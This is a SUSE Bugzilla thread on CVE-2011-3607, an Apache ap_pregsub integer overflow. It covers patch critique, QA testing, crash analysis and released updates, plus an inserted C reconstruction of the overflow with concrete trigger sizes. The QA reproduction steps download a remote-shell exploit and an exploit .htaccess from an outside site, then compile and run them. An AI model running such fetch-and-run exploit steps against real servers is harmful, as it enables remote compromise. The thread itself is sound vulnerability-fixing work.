Bugzilla – Bug 729181
VUL-0: CVE-2011-3607: apache2: integer overflow leading to a heap buffer overflow
Last modified: 2019-05-01 15:39:14 UTC
-----------------------------------------------------------------------
Name: CVE-2011-3607
Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
Reference: CONFIRM: https://bugzilla.redhat.com/show_bug.cgi?id=750935
Reference: CONFIRM: https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811422
Reference: XF: http://xforce.iss.net/xforce/xfdb/71093
Reference: BID: http://www.securityfocus.com/bid/50494
Reference: OSVDB: http://www.osvdb.org/76744
Reference: MISC: http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html
Reference: MISC: http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/
Reference: SECTRACK: http://securitytracker.com/id?1026267
Reference: SECUNIA: http://secunia.com/advisories/45793
Reference: FULLDISC: http://archives.neohapsis.com/archives/fulldisclosure/2011-11/0023.html
-----------------------------------------------------------------------
http://svn.apache.org/viewvc?view=revision&revision=1198940
The fix referred to in comment#1 is inappropriate. It causes the function in question to conditionally return APR_ENOMEM;, which contradicts the function declaration AP_DECLARE(char *) ap_pregsub(); Inquiring with upstream.
I was not able to use DemoExploit from http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html. Could you be so kind as to help me with QA maintenance testing?
Any news about how to use the reproducer from comment #0?
I visited Andrej in his office just a minute ago. The issue was that the default-server.conf contained "AllowOverride: none" which will make apache2 ignore the .htaccess configuration directives and thus the issue wasn't reproducible too. I also recommended to examine this one with gdb in order to make sure the patch is at the correct position.
int len; should also be apr_size_t len; here. (apr_size_t is either unsigned int or unsigned long)
Marcus, does this explain the arch dependent crash? I'm puzzled - this should be caught. Andrej, can you please confirm (via changelog?) that the correct packages have been installed on ppc and s390x? Thanks, Roman.
it does.
C -> assembler is tricky here and the signed overflow is not defined ... not sure why it only crashed on some platforms. Also apr_size_t will be unsigned long on 64bit, so "int len" would have had troubles in either case.
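As an added illustration of the "int len" discussion above (this is not code from this bug, from httpd, or from halfdog's exploit): a stand-alone reconstruction of the first pass of ap_pregsub, the loop that sums the length of the substituted string before allocating it. In httpd the "$0" references come from the SetEnvIf value in .htaccess and the match length from the request header, so both operands of the sum are attacker-chosen. The vulnerable version accumulates in a 32-bit integer; because signed overflow is undefined in C, the demo uses uint32_t so the wrap is deterministic rather than compiler-dependent. The hardened version keeps the sum in size_t and rejects it once it exceeds a fixed bound. The bound DEMO_PREGSUB_MAXLEN, the helper names, and the trigger sizes (524288 references to an 8192-byte header value) are assumptions made for this demo.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for ap_regmatch_t: byte offsets of one capture group. */
typedef struct { int rm_so; int rm_eo; } demo_regmatch_t;

/* Assumed bound for the hardened pass (demo value, not httpd's). */
#define DEMO_PREGSUB_MAXLEN (64 * 1024)

/* Reconstruction of the shipped first pass: length summed in a 32-bit int.
 * uint32_t replaces "int len" so the wrap is defined behaviour in the demo;
 * the result bits are what the int accumulator holds on two's-complement
 * targets. */
static int sub_len_vulnerable(const char *src, size_t nmatch,
                              const demo_regmatch_t pmatch[])
{
    uint32_t acc = 0;
    char c;
    size_t no;

    while ((c = *src++) != '\0') {
        if (c == '&')
            no = 0;
        else if (c == '$' && isdigit((unsigned char)*src))
            no = (size_t)(*src++ - '0');
        else
            no = 10;

        if (no > 9) {                                   /* ordinary byte */
            if (c == '\\' && (*src == '$' || *src == '&'))
                src++;
            acc += 1u;
        }
        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
            acc += (uint32_t)(pmatch[no].rm_eo - pmatch[no].rm_so);
        }
    }
    return (int)acc;
}

/* Hardened pass: size_t accumulator checked after every addition, so the
 * sum can neither wrap nor reach the allocator oversized. Returns 0 and
 * stores the length, or -1 when the bound is exceeded (caller returns
 * NULL / an error status instead of allocating). */
static int sub_len_safe(const char *src, size_t nmatch,
                        const demo_regmatch_t pmatch[], size_t *out_len)
{
    size_t len = 0;
    char c;
    size_t no;

    while ((c = *src++) != '\0') {
        if (c == '&')
            no = 0;
        else if (c == '$' && isdigit((unsigned char)*src))
            no = (size_t)(*src++ - '0');
        else
            no = 10;

        if (no > 9) {
            if (c == '\\' && (*src == '$' || *src == '&'))
                src++;
            len++;
        }
        else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
            len += (size_t)(pmatch[no].rm_eo - pmatch[no].rm_so);
        }
        /* len <= MAXLEN before each step and each step adds < 2^31 bytes,
         * so this check runs before size_t could ever wrap. */
        if (len > DEMO_PREGSUB_MAXLEN)
            return -1;
    }
    *out_len = len;
    return 0;
}

struct demo_result {
    int ok;                 /* 0 if the template could not be built */
    int vuln_len;           /* what the 32-bit pass computes */
    size_t alloc_request;   /* what apr_pcalloc(p, len + 1) would be asked for */
    int safe_rc;            /* 0 or -1 from the hardened pass */
    size_t safe_len;
};

/* Constructed input: a replacement of n_refs "$0" references followed by
 * tail literal bytes, paired with one match of match_len bytes. */
static struct demo_result demo_trigger(size_t n_refs, int match_len, size_t tail)
{
    struct demo_result r = {0, 0, 0, 0, 0};
    demo_regmatch_t pm[1];
    char *tmpl = malloc(2 * n_refs + tail + 1);
    size_t i;

    if (!tmpl)
        return r;
    for (i = 0; i < n_refs; i++) {
        tmpl[2 * i] = '$';
        tmpl[2 * i + 1] = '0';
    }
    memset(tmpl + 2 * n_refs, 'x', tail);
    tmpl[2 * n_refs + tail] = '\0';
    pm[0].rm_so = 0;
    pm[0].rm_eo = match_len;

    r.ok = 1;
    r.vuln_len = sub_len_vulnerable(tmpl, 1, pm);
    /* int (len + 1) widened to apr_size_t, as in the original call */
    r.alloc_request = (size_t)((long long)r.vuln_len + 1);
    r.safe_rc = sub_len_safe(tmpl, 1, pm, &r.safe_len);
    free(tmpl);
    return r;
}

int main(void)
{
    /* 524288 references x 8192 bytes = 2^32: the 32-bit sum wraps to 0, the
     * 16 literal bytes make it 16, and the allocator is asked for 17 bytes
     * before the second pass copies about 4 GiB into them. */
    struct demo_result r = demo_trigger(524288, 8192, 16);
    if (!r.ok)
        return 1;
    printf("vulnerable pass: len=%d -> allocation of %zu bytes\n",
           r.vuln_len, r.alloc_request);
    printf("hardened pass:   rc=%d (rejected before any allocation)\n",
           r.safe_rc);
    return 0;
}
```

Two things the numbers show. With a sum that wraps to a small positive value the pool hands back a tiny buffer and the copy pass overruns it, which is the code-execution case; with a sum that wraps negative, a 64-bit apr_size_t receives a huge request, which on an overcommitting Linux kernel can succeed and then fault in memset(), the behaviour reported later in this bug. Returning a status from the length check and having the char *-returning wrapper turn that into NULL keeps the declared signature of ap_pregsub intact, which was the objection raised to the first upstream patch.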
to comment #8

rpm -q apache2 --changelog | head -n 28
* Do Nov 24 2011 draht@suse.de
- httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make non-ascii eg UTF8 passwords work with mod_authnz_ldap. [bnc#727071]
* Do Nov 24 2011 draht@suse.de
- httpd-2.2.x-bnc727993-CVE-2009-3555-ssl_reneg.diff turns off SSL renegotiation [bnc#727993]. This is a partial fix for CVE-2009-3555.
- httpd-2.2.x-bnc729181-CVE-2011-3607-int_overflow.diff fixes an integer overflow in server/util.c also known as CVE-2011-3607. [bnc#729181]. Please note that the alleged denial of service weakness with resource starvation in mod_setenv from environment variables via .htaccess files, known as CVE-2011-4415, is NOT addressed with this patch. CVE-2011-4415 must be handled by the administrator's configuration of the system, because local users who can change the according settings that are subject to this CVE are trusted.
- Add SSLProtocol directive to /etc/apache2/vhosts.d/vhost-ssl.template: Allow TLSv1 only, disallow SSLv2 and SSLv3. Note that this is a template file, no default configuration change! Also: Section SetEnvIf User-Agent ".*MSIE.*" commented out to treat it as an illustrative example. [bnc#688472]
- httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff is a fix for CVE-2011-4317, which is to be seen a variant of CVE-2011-3368 which was addressed below in httpd-2.2.x-CVE-2011-3368-server_protocl_c.diff. [bnc#722545]

apache2-2.2.3-16.40.1
package submitted to sle10-sp4, sle11-sp1, sles9-sp[3-T*],4 as well as 11.3,4, 12.1. removed needinfo. reassigned to security-team@ for shipping+handling. :) Thank you!
Update released for: apache2, apache2-debuginfo, apache2-debugsource, apache2-devel, apache2-doc, apache2-event, apache2-event-debuginfo, apache2-example-certificates, apache2-example-pages, apache2-itk, apache2-itk-debuginfo, apache2-prefork, apache2-prefork-debuginfo, apache2-utils, apache2-utils-debuginfo, apache2-worker, apache2-worker-debuginfo Products: openSUSE 11.4 (debug, i586, x86_64)
Update released for: apache2, apache2-debuginfo, apache2-debugsource, apache2-devel, apache2-doc, apache2-event, apache2-example-pages, apache2-prefork, apache2-utils, apache2-worker Products: SLE-DEBUGINFO 11-SP1 (i386, ia64, ppc64, s390x, x86_64) SLE-SDK 11-SP1 (i386, ia64, ppc64, s390x, x86_64) SLE-SERVER 11-SP1 (i386, ia64, ppc64, s390x, x86_64) SLE-SERVER 11-SP1-TERADATA (x86_64) SLES4VMWARE 11-SP1 (i386, x86_64)
Update released for: apache2, apache2-devel, apache2-doc, apache2-example-pages, apache2-leader, apache2-metuxmpm, apache2-perchild, apache2-prefork, apache2-worker, libapr0 Products: SUSE-CORE 9-LTSS (i386, s390, s390x, x86_64)
Update released for: apache2, apache2-debuginfo, apache2-devel, apache2-doc, apache2-event, apache2-example-pages, apache2-prefork, apache2-worker Products: SLE-SERVER 10-SP3-TERADATA (x86_64)
Update released for: apache2, apache2-debuginfo, apache2-devel, apache2-doc, apache2-event, apache2-example-pages, apache2-prefork, apache2-worker Products: SLE-DEBUGINFO 10-SP4 (i386, ia64, ppc, s390x, x86_64) SLE-SDK 10-SP4 (i386, ia64, ppc, s390x, x86_64) SLE-SERVER 10-SP4 (i386, ia64, ppc, s390x, x86_64)
Update released for: apache2, apache2-devel, apache2-doc, apache2-example-pages, apache2-leader, apache2-metuxmpm, apache2-perchild, apache2-prefork, apache2-worker, libapr0 Products: SUSE-CORE 9-SP3-TERADATA (x86_64)
When testing the prepared maintenance update

Products: SLE-DEBUGINFO 10-SP3 (i386, s390x, x86_64), SLE-SERVER 10-SP3-LTSS (i386, s390x, x86_64)
Category: security
ZYPP Patch No: 8453
MD5 sum: 25e42b7bd84d54954a51c9fe38e777e0
SUBSWAMPID: 51067
Packager: draht@suse.com
Bugs: 777260, 757710, 741243, 743743, 738855, 736706, 719236, 722545, 727993, 688472, 729181, 727071
Packages: apache2 >= 2.2.3-16.32.45.1, apache2-devel >= 2.2.3-16.32.45.1, apache2-doc >= 2.2.3-16.32.45.1, apache2-example-pages >= 2.2.3-16.32.45.1, apache2-prefork >= 2.2.3-16.32.45.1, apache2-worker >= 2.2.3-16.32.45.1
SRCRPMs: apache2

I still see segfaults of apache2 when running the test case from :::

How to reproduce:
--- snip ---
mkdir -p /srv/www/htdocs/test
wget -O /srv/www/htdocs/test/.htaccess http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/3Thread-htaccess
set "AllowOverride ALL" in /etc/apache2/default-server.conf
cd /tmp
wget http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/SendTrigger-RemoteShell.c
gcc -o SendTrigger-RemoteShell.sh SendTrigger-RemoteShell.c
chmod +x SendTrigger-RemoteShell.sh
./SendTrigger-RemoteShell.sh
(maybe you have to repeat that a few times)
--- snip ---

After that /var/log/apache2/error_log has:
[Mon Feb 25 16:23:39 2013] [notice] child pid 7886 exit signal Segmentation fault (11)

Interestingly, the behaviour seems to have changed, since now on the first runs apache2 allocates a lot of memory (haven't seen that with the older version):

Cpu(s):  0.8%us,  7.1%sy,  0.0%ni, 45.3%id, 45.8%wa,  0.0%hi,  0.8%si,  0.0%st
Mem:   3917928k total,  3894260k used,    23668k free,     3980k buffers
Swap:  2097144k total,   872792k used,  1224352k free,     2892k cached
  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 7885 wwwrun    18   0 4315m 3.6g  148 R    9 97.6   0:04.27 httpd2-prefork
It is yet again an indication of allocation of overcommitted memory I think.

#0  0x00002ba71251730b in memset () from /lib64/libc.so.6

     dest = dst = apr_pcalloc(p, len + 1);
+    if(!dest)
+        return NULL;

So basically the "if (!dest) return NULL;" case should optimistically have triggered, but due to the memory overcommit of the Linux system it cannot do it, but later segfaults during memset() as it has no pages available. That repeated tries of the exploit are needed is a bit strange, as it indicates memory leaks.
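Review bot: the NULL check added after "dest = dst = apr_pcalloc(p, len + 1);" runs only after the oversized request has already gone to the pool allocator, so it cannot prevent the multi-gigabyte allocation shown in the top output above, and with Linux overcommit the allocation returns a pointer that only faults later in memset(), which is exactly the backtrace quoted here. The guard belongs before the allocation, on len itself: keep len as apr_size_t as noted earlier in this bug, and reject the substitution once the accumulated length exceeds a fixed bound, so that neither the wrap nor the large request can happen; as written, the check also leaves the len + 1 computation unchanged, which still wraps when len has already overflowed.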
./modules/metadata/mod_setenvif.c

    if (!b->pattern) {
        char *replaced = ap_pregsub(r->pool, elts[j].val, val,
                                    AP_MAX_REG_MATCH, regm);
        if (replaced) {
            apr_table_setn(r->subprocess_env, elts[j].key, replaced);
        }
    }
    else {
        apr_table_setn(r->subprocess_env, elts[j].key, elts[j].val);
    }

It keeps the compiled very large patterns in the "r->subprocess_env", so it will stay as long as the current worker instance runs (I think...). apr_table_setn() seems to overwrite the old value without freeing it. r->subprocess_env is allocated from r->pool so it should actually be freed on request end?
We are currently releasing the update despite this "out of memory denial of service" as it can be caused only by .htaccess setenvif things. The original bug, code execution via this problem, is solved however.
Update released for: apache2, apache2-debuginfo, apache2-devel, apache2-doc, apache2-event, apache2-example-pages, apache2-prefork, apache2-worker Products: SLE-DEBUGINFO 10-SP3 (i386, s390x, x86_64) SLE-SERVER 10-SP3-LTSS (i386, s390x, x86_64)